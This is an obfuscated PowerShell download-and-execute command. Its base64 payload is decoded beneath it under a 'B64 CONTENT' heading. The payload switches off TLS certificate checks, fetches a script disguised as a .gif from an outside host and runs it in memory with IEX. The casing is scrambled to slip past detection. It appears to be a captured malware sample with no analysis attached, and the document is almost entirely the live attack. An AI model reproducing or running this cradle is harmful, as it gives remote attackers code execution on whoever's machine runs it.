iex([SYsTEm.teXT.eNCOdinG]::UTf8.GETStrinG([SYsTeM.cOnVerT]::fRoMbAse64strInG('CltTeVNURW0uTkV0LlNFUlZpQ2VQT0ludE1BTmFHRVJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHskdFJ1ZX07SUVYICgobmV3LW9iamVjdCBuZXQuV0VCY2xJZW50KS5Eb1duTG9BRFN0cmlORygnaHR0cHM6Ly93d3cuc2VjdXJpdHktc3VwcG9ydC50ZWNoL3BhbmRhLmdpZicpKQoK')));exit

##### B64 CONTENT #####


[SySTEm.NEt.SERViCePOIntMANaGER]::ServerCertificateValidationCallback = {$tRue};IEX ((new-object net.WEBclIent).DoWnLoADStriNG('https://www.security-support.tech/panda.gif'))

